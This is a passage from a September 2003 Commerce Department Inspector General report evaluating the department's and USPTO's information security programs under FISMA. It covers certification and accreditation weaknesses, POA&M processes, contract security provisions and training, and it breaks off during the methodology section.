b"\x0cU.S. Department of Commerce                                                                        Final Inspection Report OSE-16146 \n\nOffice of Inspector General                                                                                            September 2003\n\n\n\n                                                                   CONTENTS\n\nEXECUTIVE SUMMARY ............................................................................................................. i\n\n\nINTRODUCTION .......................................................................................................................... 1 \n\n\nOBJECTIVES, SCOPE, AND METHODOLOGY........................................................................ 1 \n\n\nFINDINGS...................................................................................................................................... 4 \n\n\nI. \t    Information Security in IT Service Contracts Is Improving, but Additional Efforts Are \n\n        Needed ................................................................................................................................... 4 \n\nII. \t The Department Is Continuing to Refine Its Systems Inventory ........................................... 6 \n\nIII. \t The Department Should Continue to Report Information Security as a Material \n\n       Weakness ............................................................................................................................... 7 \n\nIV. \t The Department Has Established a Sound Plan of Action and Milestone (POA&M) \n\n      Process ................................................................................................................................... 9 \n\nV. \t Responsibilities and Authorities Are Clearly Specified for the Department CIO and \n\n     Operating Unit Officials ...................................................................................................... 12 \n\nVI.      Significant IT Investments Require CIO Concurrence....................................................... 15 \n\nVII. \t Steps for Managing Life Cycle Information Security Are Prescribed in the                                      \n\n      Department\xe2\x80\x99s Policy............................................................................................................. 16 \n\nVIII. Information Security and Critical \tInfrastructure Protection Responsibilities Are Well            \n\n      Integrated, and Coordination With Other Security Functions Is Increasing........................ 19 \n\nIX. \t National- and Mission-Critical Asset Identification Efforts Continue to Be Refined........ 21 \n\nX. \t The Department\xe2\x80\x99s Information Security Policy Has Requirements for Documenting \n\n     Incident Reporting Procedures............................................................................................. 22 \n\nXI. \t The Department\xe2\x80\x99s Risk Assessments, Security Plans, and Testing of Security Controls \n\n      Continue to Need Serious Attention .................................................................................... 25 \n\nXII. \tUSPTO Is Making Significant Improvements to Risk Assessments, Security Plans,                                             \n\n      and Testing of Security Controls ......................................................................................... 27 \n\nXIII. The Department CIO Continues to Make Progress in Improving Information Security \n\n      Throughout Commerce ........................................................................................................ 28 \n\nXIV. Information Security Awareness Training Is Being Addressed, but Specialized                                  \n\n     Training Requirements Are Needed .................................................................................... 30 \n\nXV. \tIntegration of Security into the Capital Planning and Investment Control Process Is \n\n     Improving............................................................................................................................. 32 \n\nXVI. Conclusion .......................................................................................................................... 33 \n\nAppendix A. Evaluation of Certification and Accreditation Materials ..................................... A-1 \n\nAppendix B. OIG Evaluations Used In This Report.................................................................. B-1 \n\n\x0cU.S. Department of Commerce                                                     Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                                        September 2003\n\n\n\n\n\n                                         EXECUTIVE SUMMARY \n\n\nThe Federal Information Security Management Act (FISMA), signed into law on December 17,\n2002, provides a comprehensive framework for ensuring that information resources supporting\nfederal operations and assets employ effective security controls. FISMA requires agencies to\nconduct annual information security program reviews and Offices of Inspector General (OIGs) to\nperform annual independent evaluations of those programs. Our independent evaluation for\nFY 2003 sought to determine whether the Department of Commerce\xe2\x80\x99s information security\nprogram and practices for unclassified systems comply with FISMA.\n\nAs a performance-based organization, the United States Patent and Trademark Office (USPTO)\nhas submitted its budget materials, information security review, and Performance and\nAccountability Report separate from those of the Department. For the past 2 fiscal years, we\nprepared a separate independent evaluation report on USPTO. For fiscal year 2003, however, we\nhave included USPTO in this single, Commerce-wide evaluation report, as has the Department in\nits OMB submission. This consolidation is in keeping with OMB\xe2\x80\x99s FY 2002 Report to Congress\non federal government information security reform, in which it combined USPTO with the rest\nof Commerce.\n\nThe structure and content of this report are designed to be responsive to the guidance provided\nby OMB in Reporting Instructions for the Federal Information Security Management Act, while\nalso providing useful information for Commerce officials. As directed in this guidance\ninstructions, we begin with our response to question A.2.a.\n\n    Total number of programs, systems, and\n                                                 Our evaluation is based on the results of OIG\n    contractor operations or facilities          reviews and audits of 43 systems in 9 of\n    evaluated in FY 2003. (OMB Question A.2.a)   Commerce\xe2\x80\x99s 14 operating units. These\n                                                 assessments looked at (1) selected systems at the\n                                                 National Oceanic and Atmospheric\nAdministration (NOAA); (2) general controls of financial systems (reviewed as part of the\nFY 2002 consolidated financial statement audit and financial statement audits of the National\nTechnical Information Service (NTIS) and USPTO); (3) status of the issues identified at the\nNational Institute of Standards and Technology (NIST) and USPTO in our in-depth evaluation of\nthese organizations last year; and (4) risk assessments, security plans, contingency plans, security\ntest and evaluation materials (test procedures and results), certification and accreditation1\ndocuments, capital asset plans (Exhibit 300s), and plans of action and milestones (POA&Ms)2\nfor a range of operating unit systems. We obtained additional information through interviews\nwith the chief information officers (CIOs) and senior information security officials of the\nDepartment, Census Bureau, International Trade Administration (ITA), NIST, NOAA, and\nUSPTO.\n\n1\n  Certification is the formal testing and evaluation of the security safeguards on a computer system to determine\nwhether they meet applicable requirements and specifications. Accreditation is the formal authorization by\nmanagement for system operation, including an explicit acceptance of risk.\n2\n  OMB guidance directs agencies to develop plans of action and milestones (POA&Ms) to correct program- and\nsystem-level IT security weaknesses and track each deficiency until it is corrected.\n\n                                                          i\n\x0cU.S. Department of Commerce                                                   Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                                      September 2003\n\n\n\n\nWe also reviewed a random sample of 24 contracts awarded by Census, NIST, NOAA, Office of\nthe Secretary, and USPTO for the period October 2002 through August 20, 2003, to assess the\nDepartment\xe2\x80\x99s progress in incorporating information security requirements into information\ntechnology (IT) service contracts. Our principal\nfindings are summarized below.                         Information security in IT service\n                                                                   contracts. (OMB Question A.2 b-e)\nInformation Security in IT Service Contracts Is\nImproving, but Additional Efforts Are Needed. Commerce\xe2\x80\x99s IT expenditures accounted for\nnearly half ($500 million) of all contract obligations in FY 2002; some two-thirds of that amount\n(approximately $334 million) was for IT services. Our FY 2002 independent evaluation\nincluded a review of information security provisions in departmental contracts3 for these services\nand found that most contracts had either insufficient security provisions or none at all. We\nconcluded that federal and departmental policy and guidance for incorporating such provisions\nwere lacking. In the intervening year, the Department issued its information security policy and\ndrafted a standard contract provision\xef\xa3\xa7currently under departmental review\xef\xa3\xa7for safeguarding\nthe security of unclassified systems and information. The draft provision requires, among other\nthings, a system security plan and certification and accreditation for contracted IT resources/\nservices that involve connection to Commerce networks or storage of Commerce data on\ncontractor-owned systems.\n\nOur FY 2003 independent evaluation found that some progress has been made in incorporating\nsecurity provisions into recent IT service contracts. However, there remains (1) a general\nabsence of provisions for controlling access to Department systems and networks; and (2) little\nevidence of contract oversight, or of coordination among contracting, technical, and information\nsecurity personnel in developing appropriate contract security requirements. We believe the\ngeneral absence of such provisions and the inadequate interface among all staff involved in the\ncontracting/information security process continue to place Commerce systems and data at risk.\n(See page 4.)\n\n                                  The Department Is Continuing to Refine its Systems\nAgency\xe2\x80\x99s work to develop an\ninventory of major IT systems.\n                                  Inventory. Commerce\xe2\x80\x99s new information security policy,\n(OMB Question A.2.f)              issued in January 2003, requires all operating units to maintain\n                                  a comprehensive systems inventory. Each unit, including\nUSPTO, provides an updated copy of its inventory to the Department\xe2\x80\x99s IT security program\nmanager twice a year. As part of its compliance reviews of information security, the\nDepartment\xe2\x80\x99s CIO Office is validating the inventory data, with emphasis on determining whether\noperating units are properly applying NIST criteria in defining system boundaries. (See page 6.)\n\nThe Department Should Continue to Report Information                   Material weaknesses.\n                                                                       (OMB Question A.3)\nSecurity as a Material Weakness. For the past 2 fiscal years, the\nDepartment has reported information security as a material\nweakness in its Accountability Report. In our FY 2002 independent evaluation, we stated that\nthe Department should continue to report information security as a material weakness until all\n\n3\n The term \xe2\x80\x9ccontract\xe2\x80\x9d includes task orders and delivery orders issued under multiple award contracts and\ngovernment-wide agency contracts (GWACs).\n\n                                                        ii\n\x0cU.S. Department of Commerce                                                  Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                                     September 2003\n\n\n\nsystems that are national critical (part of the critical infrastructure) and mission critical have been\ncertified and accredited. The Department set a goal for certifying and accrediting these systems\nby the end of FY 2003. In our evaluation this year, we found numerous systems that have been\nreported as certified and accredited with significant deficiencies in their certification and\naccreditation materials\xef\xa3\xa7risk assessments, security plans, and contingency plans\xef\xa3\xa7and in most\ncases, lack evidence that security controls had been tested. These problems call into question the\neffectiveness of the certification and accreditation processes being used.\n\nWe understand that some of the certifications and accreditations that we reviewed are being\nreworked to meet the requirements of the Department\xe2\x80\x99s new information security policy.4\nHowever, given the shortcomings in the systems we evaluated, we do not believe that\ncertification and accreditation of the Department\xe2\x80\x99s roughly 340 national-critical and mission-\ncritical systems5\xe2\x80\x94of sufficient quality and content\xe2\x80\x94can be completed by the end of the fiscal\nyear. Thus, while the Department is to be commended for its push to certify and accredit its\ncritical systems, we believe that information security should be reported as a material weakness\nfor FY 2003. We have worked closely with the Department CIO on information security\nconcerns throughout the year, and he has indicated agreement with our conclusion. (See page 7.)\n\nUSPTO. Last year we found that USPTO lacked current certifications and accreditations for its\nsystems and suggested that it report information security as a material weakness until its mission-\ncritical systems are certified and accredited. (USPTO has no systems designated as national\ncritical). USPTO reported information security as a material weakness in its FY 2002\nAccountability Report, and set a goal of certifying and accrediting all high-risk systems by the\nend of FY 2003. The agency subsequently revised its systems inventory by consolidating more\nthan 100 systems into 19 systems, 9 mission critical and the remainder business essential. It\nplanned to have its 9 mission-critical systems and 1 classified system certified and accredited by\nthe end of FY 2003. As of mid-September, all 10 systems had undergone certification testing,\n5 had been granted interim accreditations, and 1 had received final accreditation. USPTO\nexpects to grant the remaining 4 systems 120-day interim accreditations by the end of the fiscal\nyear.\n\nUSPTO is employing a disciplined certification and accreditation process that includes rigorous\ntesting of security controls. Interim accreditations are not granted without comprehensive risk\nassessments, security plans, and testing. But because of the security weaknesses being identified\nby the certification process and the lack of final accreditations, we believe that USPTO should\nreport information security as a material weakness for FY 2003. (See page 8.)\n\n                              The Department Has Established a Sound Plan of Action and\n    Agencywide plan of action\n    and milestone process.    Milestone (POA&M) Process. The requirements for POA&Ms\n    (OMB Question A.4)        are specified in the Department\xe2\x80\x99s information security policy and\n                              are responsive to the criteria in OMB\xe2\x80\x99s FY 2003 FISMA\nguidance. Commerce develops, implements, and manages POA&Ms for all of its systems that\nhave identified security weaknesses. System owners6 are required to prepare the POA&Ms for\n\n4\n  We obtained certification and accreditation materials from the operating units in June and July 2003. \n\n5\n  The number of systems is based on the Department\xe2\x80\x99s March 2003 system inventory. \n\n6\n  The Department\xe2\x80\x99s information security policy defines a system owner as a project manager with day-to-day\n\n\n                                                       iii\n\x0cU.S. Department of Commerce                                                  Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                                     September 2003\n\n\n\ntheir systems, and the operating unit IT security officer prepares the POA&M for the unit\xe2\x80\x99s\nprogram. Operating units are required to submit their POA&Ms, including the status of\ncorrective actions, to the Department CIO Office monthly. Commerce monitors POA&Ms\nclosely and uses them to manage corrective actions for all identified weaknesses. OIG has\naccess to all POA&Ms, but because many are based primarily on self-assessments, which may\nnot identify all weaknesses, we place greater reliance for identifying weaknesses on independent\nreviews. Commerce\xe2\x80\x99s POA&M database does not include the accounting codes associated with\neach line of the IT budget request, and IT system and budget reviews do not formally take into\naccount the content of the POA&Ms, although attention is given to information security in these\nreviews. The CIO Office intends to tie POA&Ms to the system budget request in\nFY 2004. (See page 9.)\n\nUSPTO. Like the Department, USPTO develops, implements, and manages POA&Ms for all of\nits systems that have identified security weaknesses. Its CIO Office develops the POA&Ms,\ncollaborating with program officials to ensure that information security weaknesses are\naddressed. To satisfy OMB\xe2\x80\x99s guidance, program officials at USPTO need to have primary\nresponsibility for the POA&Ms that support their operations. Beginning in FY 2004, USPTO\nwill submit its POA&Ms to the Department\xe2\x80\x99s CIO Office for incorporation into Commerce\xe2\x80\x99s\nconsolidated report to OMB. (See page 9.)\n\nResponsibilities and Authorities Are Clearly                Steps taken by the agency head to\n                                                            clearly and unambiguously set forth\nSpecified for the Department CIO and Operating              FISMA\xe2\x80\x99s responsibilities and authorities\nUnit Officials. The responsibilities and authorities        for the agency CIO and program officials,\n                                                            and actions to implement and enforce\nfor the Department\xe2\x80\x99s CIO and program officials              these steps. (OMB Question B.1)\nhave been clearly specified in the new information\nsecurity policy. Accordingly, the CIO has primary\noversight of all aspects of Commerce\xe2\x80\x99s information security program and reports to the Deputy\nSecretary on the status of information security within the Department. Operating unit heads have\nexplicit responsibility for the unit\xe2\x80\x99s information security, and program officials\xef\xa3\xa7members of an\noperating unit\xe2\x80\x99s top-level management team\xef\xa3\xa7must ensure the implementation of an effective\ninformation security program for the systems under their responsibility.\n\nIn July 2001, the Secretary directed secretarial officers and heads of operating units to give\ninformation security high priority and sufficient resources. Over the past 2 years, the Deputy\nSecretary has reinforced this direction and given the Department CIO strong support for\nimproving information security. Indeed, we believe that the progress made by Commerce in\ninformation security is attributable not only to the formal authority granted to the CIO position\nand the vigorous efforts of that official, but also to the Deputy Secretary\xe2\x80\x99s support, which has\nsignificantly enhanced the CIO\xe2\x80\x99s effectiveness. Simply stated, operating unit heads understand\nthat information security is a priority for the Deputy Secretary and that they need to be\nresponsive to issues raised by the Department CIO.\n\nIn addition, corrective actions at NIST demonstrate that operating unit heads are better\nrecognizing their new responsibilities. Last year we performed an in-depth review of NIST\xe2\x80\x99s\n\nmanagement and operational control over the system and direct oversight of the system/network administrators and\noperations staff.\n\n                                                       iv\n\x0cU.S. Department of Commerce                                             Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                                September 2003\n\n\n\ninformation security program, which identified numerous weaknesses. In response to our\nfindings, the NIST director took significant improvement actions. This year, we found that NIST\nhas made excellent progress in responding to our concerns and improving its information\nsecurity program. (See page 12.)\n\nUSPTO. The information security responsibilities and authorities for the agency\xe2\x80\x99s CIO and\nprogram officials are delineated in USPTO\xe2\x80\x99s draft Agency Administrative Order (AAO) 212-4,\nInformation Technology Security, which is expected to be finalized by the end of the fiscal year.\nOur independent evaluation last year reported that USPTO had long-standing information\nsecurity weaknesses requiring senior management attention. At the time, the agency\xe2\x80\x99s CIO had\nbeen in place for only a short period. This official and the Director of USPTO began a concerted\neffort to improve the agency\xe2\x80\x99s information security program, including devoting more resources\nto it and working to improve policy, controls, and oversight. The results of their commitment are\nevident in a considerably improved information security program. (See page 14.)\n\n                                 Significant IT Investments Require CIO Concurrence. No\n Authority for IT investment\n decisions. (OMB Question B.2)\n                                 operating unit can make a major IT investment without the\n                                 Department CIO\xe2\x80\x99s review and concurrence. The Commerce\n                                 Information Technology Review Board, cochaired by the CIO\nand chief financial officer (CFO), was established to support IT investment decision making.\nCertain IT initiatives not necessarily reviewed by the board are also subject to the Department\nCIO\xe2\x80\x99s approval. All other significant IT investment proposals must be approved by the\noperating unit CIO. (See page 15.)\n\nUSPTO. A management council consisting of USPTO senior executives, including the CIO,\nreviews and approves the agency\xe2\x80\x99s budget, including IT investments. The council also must\napprove all new initiatives, including IT investments, having a life-cycle cost greater than\n$100,000. Only those IT investments with which the agency CIO concurs are brought before the\ncouncil. (See page 15.)\n\nSteps for Managing Life Cycle\nInformation Security Are Prescribed in           Agency head\xe2\x80\x99s efforts to ensure that the information\n                                                 security plan is practiced throughout the life cycle of\nthe Department\xe2\x80\x99s Policy. The                     each system. Specific and direct actions taken by\nDepartment\xe2\x80\x99s new policy delineates the           the agency head to verify that the unit\xe2\x80\x99s program\n                                                 officials and CIO are ensuring that security plans are\nrequirements for managing information            up-to-date and practiced throughout the life cycle of\nsecurity for each system life-cycle phase and    each system. (OMB Questions B.3 and B.4)\nassigns primary responsibility to the system\nowner. Commerce has management and oversight processes to help ensure that life-cycle\ninformation security requirements are adhered to for all but one phase\xe2\x80\x94disposal\xe2\x80\x94for which it\nlacks an oversight mechanism. (See page 16.)\n\nUSPTO. USPTO\xe2\x80\x99s draft policy states that information security is managed throughout a\nsystem\xe2\x80\x99s life cycle, a responsibility assigned primarily to system owners. However, the policy\ndoes not contain a clear and concise delineation of requirements by life-cycle phase, nor does the\nagency\xe2\x80\x99s system life-cycle management manual (LCM). Both of these documents would be\nimproved by the addition of such information so that program officials and system owners fully\n\n\n                                                    v\n\x0cU.S. Department of Commerce                                           Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                              September 2003\n\n\n\nunderstand their roles. The draft policy describes information security oversight reviews to be\nconducted by USPTO\xe2\x80\x99s CIO Office, and a technical review board appointed by the CIO is\ncharged with evaluating systems and associated information security concerns at key system\nmilestones. The certification testing conducted this past year identified areas throughout the\nsystem life cycle in which policies, procedures, and processes need to be improved. USPTO\nintends to revise its technical standards and guidelines and streamline its LCM next fiscal year to\naddress these issues. (See page 16.)\n\n                                                     Information Security and Critical\n  Integration of information security program with\n                                                     Infrastructure Protection Responsibilities\n  critical infrastructure protection responsibilities and\n                                                     Are Well Integrated, and Coordination\n  other security programs (e.g., continuity of operations,\n  and physical and operational security), including efforts\n  to eliminate unnecessary overhead costs and ensure\n                                                     With Other Security Functions Is\n  that policies and procedures are consistent and    Increasing. Commerce\xe2\x80\x99s critical\n  complementary across the various programs and      infrastructure and information security\n  disciplines. (OMB Questions B.5 and B.6)\n                                                     programs are under the authority of the\nDepartment CIO and are highly integrated. The Department\xe2\x80\x99s policy delineates partnerships that\nmust be maintained with offices under the CFO that have other security responsibilities,\nincluding the Office of Security (OSY), the Office of Human Resources Management, and the\nOffice of Acquisition Management. (See page 19.)\n\nUSPTO. The agency\xe2\x80\x99s draft policy addresses coordination and cooperation between information\nsecurity and other security programs, including interface with USPTO\xe2\x80\x99s physical security and\nhuman resource offices. USPTO has no national-critical assets. (See page 20.)\n\nNational- and Mission-Critical Asset                 Agency\xe2\x80\x99s identification of its critical operations\nIdentification Efforts Continue to Be                and assets (both national critical and mission\nRefined. Commerce has identified its                 critical) and the interdependencies and\n                                                     interrelationships of those operations and\nnational-critical assets\xe2\x80\x94an inventory it             assets. (OMB Question B.7)\ncontinues to update and refine\xe2\x80\x94but has not\ndetermined the interdependencies among them. Both the Department and USPTO have\nidentified and continue to refine their mission-critical asset inventory, and to the extent that\nsecurity plans for these systems follow the required NIST guidance, they identify direct\ninterconnections with other systems for information sharing. As the Department and USPTO\ndefine and document their enterprise architectures\xef\xa3\xa7which show the relationship between\nbusiness functions and the technologies and information that support them\xef\xa3\xa7they should identify\ninterrelationships of mission-critical systems. (See page 21.)\n\n                                          The Department\xe2\x80\x99s Information Security Policy Has\n  How agency head ensures that the agency\n  and all its components have documented\n                                          Requirements for Documenting Incident Reporting\n                                          Procedures. The Department\xe2\x80\x99s policy defines the\n  procedures for reporting security incidents\n  and sharing information about common    types of incidents that need to be reported and requires\n  vulnerabilities. (OMB Question B.8)\n                                          each operating unit to submit its response procedures\n                                          to Commerce\xe2\x80\x99s CIO Office for review and approval.\nThe policy requires operating unit computer incident response teams (CIRTs) and the\nDepartment\xe2\x80\x99s CIRT to report incidents to the Federal Computer Incident Response Center\n(FedCIRC), but does not set a timeframe for doing so. A memorandum of agreement between\n\n\n                                                         vi\n\x0cU.S. Department of Commerce                                                     Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                                        September 2003\n\n\n\nOIG, CIO, and OSY\xef\xa3\xa7which will be revised and renewed in FY 2004\xef\xa3\xa7delineates roles,\nresponsibilities, and procedures for reporting incidents to OIG and external law enforcement.\nThe details of this agreement need to be incorporated into or referenced by the Department\xe2\x80\x99s\ninformation security policy. (See page 22.)\n\nUSPTO. USPTO has draft incident response procedures, which it intends to finalize by the end\nof the fiscal year. While detailed and specific, the procedures do not provide a timeframe for\nreporting incidents to FedCIRC or require notifying OIG when an incident occurs. The director\nof the IT Security Program Office told us that modifications will be made to address these areas\nbefore the procedures are finalized. (See page 23.)\n\nThe Department\xe2\x80\x99s Risk Assessments, Security\n                                                          Risk assessments, security level\nPlans, and Testing of Security Controls                   determinations, security plans, and\nContinue to Need Serious Attention. Our                   security control testing and evaluation.\nevaluation this year found many risk assessments          (OMB Question C.1)\n\nand security plans that did not provide essential\ninformation for determining appropriate system security controls, and still others whose\ninformation was inaccurate or inconsistent. We also found that certifications were frequently\ngranted without careful review of the documentation and with little or no testing, and thus did\nnot identify residual risks.7 Without reliable documentation and certifications, accrediting\nofficials lack sufficient information for making informed decisions about whether a system\xe2\x80\x99s\nresidual risks are acceptable and accreditation is therefore desirable. The deficiencies we\nidentified affected systems controlled by program officials as well as by operating unit CIOs.\nAccording to the Department CIO, improvements are being made to the certification and\naccreditation process that should correct some of the problems we identified with the current\naccreditations. (See page 25.)\n\nUSPTO Is Making Significant Improvements to Risk Assessments, Security Plans, and\nTesting of Security Controls. The agency\xe2\x80\x99s one certified and accredited system had a thorough\nrisk assessment and comprehensive security and contingency plans. Certification included\nextensive testing of security controls that identified weaknesses in the system itself, as well as\norganization-wide security issues. USPTO appears to be using the same rigorous process for\ncertifying and accrediting its remaining systems. It is clear that as the agency corrects the\nproblems identified by means of its certification and accreditation program, its systems will be\nappreciably more secure. (See page 27.)\n\n                                         The Department CIO Continues to Make\n                                         Progress in Improving Information Security\n    The agency CIO\xe2\x80\x99s ability to adequately\n    maintain an agencywide information\n    security program, ensure effective   Throughout Commerce. The Department CIO has\n    implementation of the program, and   focused intensely on improving information\n    evaluate the performance of major agency\n    components. (OMB Question C.2)\n                                         security and has made significant strides. In\n                                         finalizing the new information security policy this\npast January, he gave Commerce a comprehensive blueprint for securing agency information\nsystems. The Department CIO is making a determined effort to effectively implement the\n\n7\n Residual risks are the risks remaining after appropriate security controls have been applied to the information\nsystem.\n\n                                                         vii\n\x0cU.S. Department of Commerce                                          Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                             September 2003\n\n\n\nsecurity program, though much remains to be done\xef\xa3\xa7especially in assessing risk, determining \n\nappropriate security controls, testing and evaluating these controls, and certifying and accrediting \n\nsystems. But satisfying the demands of information security law, policy, and guidance requires \n\nsubstantial change in the culture of an organization that, until recently, has given scant attention \n\nto this area. Thus, it remains a considerable challenge to ensure that program and IT officials \n\nthroughout the Department and personnel with specialized information security roles understand \n\ntheir responsibilities and have the knowledge and skills to carry them out effectively. The \n\nDepartment CIO Office is evaluating the performance of all Commerce operating units through a \n\ncompliance review program designed to validate the security information they report and assess \n\nthe effectiveness of their information security programs. (See page 28.) \n\n\nUSPTO. Last fiscal year, USPTO\xe2\x80\x99s newly appointed CIO began giving serious attention to \n\nimproving information security and has made considerable progress. USPTO\xe2\x80\x99s information \n\nsecurity policies, when refined and finalized, should address the requisite security program\n\nrequirements. As we have discussed previously, USPTO is well on its way to certifying and \n\naccrediting all of its mission-critical systems and is using sound processes to do so. As with the \n\nrest of the Department, effectively implementing the required information security program at \n\nUSPTO requires significant cultural change. USPTO\xe2\x80\x99s CIO is currently working with program\n\nofficials to facilitate their understanding and acceptance of their more active role and increased \n\naccountability before the policy is finalized. We believe the CIO\xe2\x80\x99s effort is essential to initiating \n\nand maintaining an effective information security program. \n\n\nThe involvement in and oversight of USPTO\xe2\x80\x99s CIO Office in the ongoing certification and \n\naccreditation efforts, the POA&M process, and the work of an employee designated as an \n\ninternal IT auditor are the principal means by which USPTO is evaluating its major components. \n\nThe Department intends to assess USPTO as part of its compliance review program. \n\n(See page 28.) \n\n\nInformation Security Awareness Training Is              The agency CIO\xe2\x80\x99s efforts to ensure that all\nBeing Addressed, but Specialized Training               agency employees, including contractors\nRequirements Are Needed. The Department\xe2\x80\x99s               and those employees with significant\n                                                        information security responsibilities, are\npolicy includes requirements for security               aware of and trained in information security\nawareness training for new employees and                policies and practices. (OMB Question C.3)\n\ncontractors, and annual refresher training for all\nexisting employees and contractors who have access to systems containing sensitive information.\nDuring this fiscal year, the Department CIO acquired an enterprise license for web-based\ninformation security training, which will make awareness refresher training available free of\ncharge to Commerce employees and contractors. However, we found slow progress has been\nmade in providing specialized training for personnel with significant information security\nresponsibilities. The Department has been attempting to establish more uniform requirements or\nguidance for specialized training, and in the meantime, is making specialized training available\nthroughout Commerce via the same enterprise license. Our independent evaluation this year\nfound that some IT security officers and system administrators still lack a sufficient\nunderstanding of their duties and responsibilities. We also found a pervasive lack of\nunderstanding of the objectives and requirements of system risk assessment, security planning,\n\n\n\n                                                 viii\n\x0cU.S. Department of Commerce                                        Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                           September 2003\n\n\n\ncontingency planning, and certification and accreditation. These findings highlight the\nimportance of ensuring that specialized security training is provided to those who need it.\n(See page 30.)\n\nUSPTO. USPTO is using the Department\xe2\x80\x99s enterprise license to provide the mandated annual\nawareness refresher training, and plans to implement specialized training for approximately 150\nemployees and contractors, also via the Department\xe2\x80\x99s license. USPTO executives have received\nspecialized training in information security, including certification and accreditation, and CIO\nmanagers and staff have been trained in USPTO\xe2\x80\x99s IT processes, including information security.\nUSPTO is using NIST guidance to develop requirements for specialized training. (See page 31.)\n\n                                        Integration of Security into the Capital Planning and\n   Agency CIO\xe2\x80\x99s efforts to fully        Investment Control Process Is Improving. We\n   integrate security into the capital\n   planning and investment control      reviewed FY 2004 capital asset plans for BIS, NESDIS,\n   process. (OMB Question C.4)          NOS, NWS, and NTIA (FY 2005 plans were not available\n                                        when we conducted our fieldwork). In general, these\nplans provide more specific information than last year\xe2\x80\x99s plans on security requirements and how\nthey are addressed. Some, however, still contained generic discussions of security requirements\nand controls, and it was unclear in one plan whether the system had been certified and\naccredited. All of the plans stated that the system\xe2\x80\x99s security controls had been tested. Our\nassessment found little if any testing of security controls for most systems beyond self\nassessments. (See page 32.)\n\nUSPTO. The agency prepared capital asset plans for the FY 2004 budget submission that\ncomprehensively addressed the areas required by OMB and demonstrate that USPTO has made a\nserious effort to include information security in its capital asset planning. (See page 32.)\n\nConclusion. Our FY 2003 FISMA review found that senior management\ncontinues to give attention to information security. With the support of       Conclusion\nthe Deputy Secretary, the Department\xe2\x80\x99s CIO has worked hard to improve\ninformation security throughout Commerce and has made noteworthy progress. The\nDepartment\xe2\x80\x99s new policy comprehensively defines Commerce\xe2\x80\x99s program for assuring agency\ninformation systems are adequately protected, and its detailed requirements are helping improve\nthe security programs of the operating units.\n\nThis noteworthy progress is moderated by considerable challenges. The most difficult of these\nhas been ensuring adequate security on the hundreds of Commerce systems\xe2\x80\x94a challenge that\ncannot be fully met until program and IT officials throughout the Department better understand\nwhat is expected of them, and all personnel with specialized information security roles acquire\nand maintain the requisite knowledge and skills. (See page 33.)\n\nUSPTO. USPTO\xe2\x80\x99s information security program continues to progress. This agency is working\nto ensure that its senior program officials understand and accept their responsibilities for\ninformation security, a prerequisite for an effective and long-lived program. USPTO is well on\nits way to having systems certified and accredited. And because it is using a rigorous approach\nand comprehensive testing, it has gained a great deal of insight into system-specific weaknesses\n\n\n                                                ix\n\x0cU.S. Department of Commerce                                    Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                       September 2003\n\n\n\nthat must be corrected and organization-wide security policies, procedures, and processes that\nmust be improved. USPTO must continue to focus on correcting the identified system\nweaknesses; improve policies, procedures, and processes; and ensure compliance on a continuing\nbasis. (See page 33.)\n\n\n\n\n                                              x\n\x0cU.S. Department of Commerce                                                     Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                                        September 2003\n\n\n\n\n                                              INTRODUCTION\n\nThe Federal Information Security Management Act (FISMA), set out in Title III of the\nE-Government Act of 2002 (P.L. 107-347), was signed into law on December 17, 2002. FISMA\npermanently reauthorized and expanded upon the framework laid out in the Government\nInformation Security Reform Act of 2000 (GISRA),8 for ensuring that information resources\nsupporting federal operations and assets are protected by effective security controls. FISMA\nrequires agencies to conduct annual information security program reviews and Offices of\nInspector General (OIGs) to perform annual independent program evaluations.\n\nAs a performance-based organization, the United States Patent and Trademark Office (USPTO)\nhas submitted its budget materials, information security review, and Performance and\nAccountability Report separate from those of the Department. For the past 2 fiscal years, we\nprepared a separate independent evaluation report on information security at USPTO. For fiscal\nyear 2003, however, we are including USPTO in this single, Commerce-wide evaluation report,\nas is the Department in its OMB submission. This consolidation is in keeping with OMB\xe2\x80\x99s\nFY 2002 Report to Congress on federal government information security reform, in which it\ncombined USPTO with the rest of Commerce. The details and results of our independent\nevaluation for FY 2003 follow below.\n\n\n                          OBJECTIVES, SCOPE, AND METHODOLOGY\n\nWe sought to determine whether the Department of Commerce\xe2\x80\x99s (DOC\xe2\x80\x99s) information security\nprogram and practices for unclassified systems comply with the requirements of FISMA. Our\nevaluation is based on the results of the following OIG work:\n\n1. \t Assessments of selected systems at the National Oceanic and Atmospheric Administration\xe2\x80\x99s\n     (NOAA\xe2\x80\x99s) National Marine Fisheries Service (NMFS) and National Environmental Satellite\n     Data and Information Service (NESDIS);\n\n2. \t Audit of general controls of financial systems (reviewed as part of the Department\xe2\x80\x99s FY 2002\n     consolidated financial statement audit and the financial statement audits of the National\n     Technical Information Service (NTIS) and USPTO);\n\n3. \t Review of the status of issues identified at the National Institute of Standards and\n     Technology (NIST) and USPTO in our in-depth evaluation of these organizations last year;\n\n4. \t Review of risk assessments, security plans, contingency plans, security test and evaluation\n     materials (test procedures and results), certification and accreditation9 documents, capital\n\n\n8\n GISRA expired in November 2002. \n\n9\n Certification is the formal testing and evaluation of the security safeguards on a computer system to determine \n\nwhether they meet applicable requirements and specifications. Accreditation is the formal authorization by\n\nmanagement for system operation, including an explicit acceptance of risk. \n\n\n                                                          1\n\n\x0cU.S. Department of Commerce                                                     Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                                        September 2003\n\n\n\n     asset plans (Exhibit 300s), and plans of action and milestones (POA&Ms)10 for a range of\n     systems in the Bureau of Economic Analysis (BEA), Bureau of Industry and Security (BIS),\n     Census Bureau, International Trade Administration (ITA), NIST, NTIS, and National\n     Telecommunications and Information Administration (NTIA), NOAA, and USPTO;\n\n5. \t Interviews with the CIOs and senior information security officials of the Department,\n     Census, ITA, NIST, NOAA, and USPTO to obtain additional information regarding the\n     agencywide POA&M process and responsibilities of the agency head, operating unit heads,\n     and agency and operating unit program officials and chief information officers (CIOs), and\n\n6. \t Review of a random sample of 24 contracts at Census, NIST, NOAA, Office of the\n     Secretary, and USPTO to assess the Department\xe2\x80\x99s progress in incorporating information\n     security requirements into information technology (IT) service 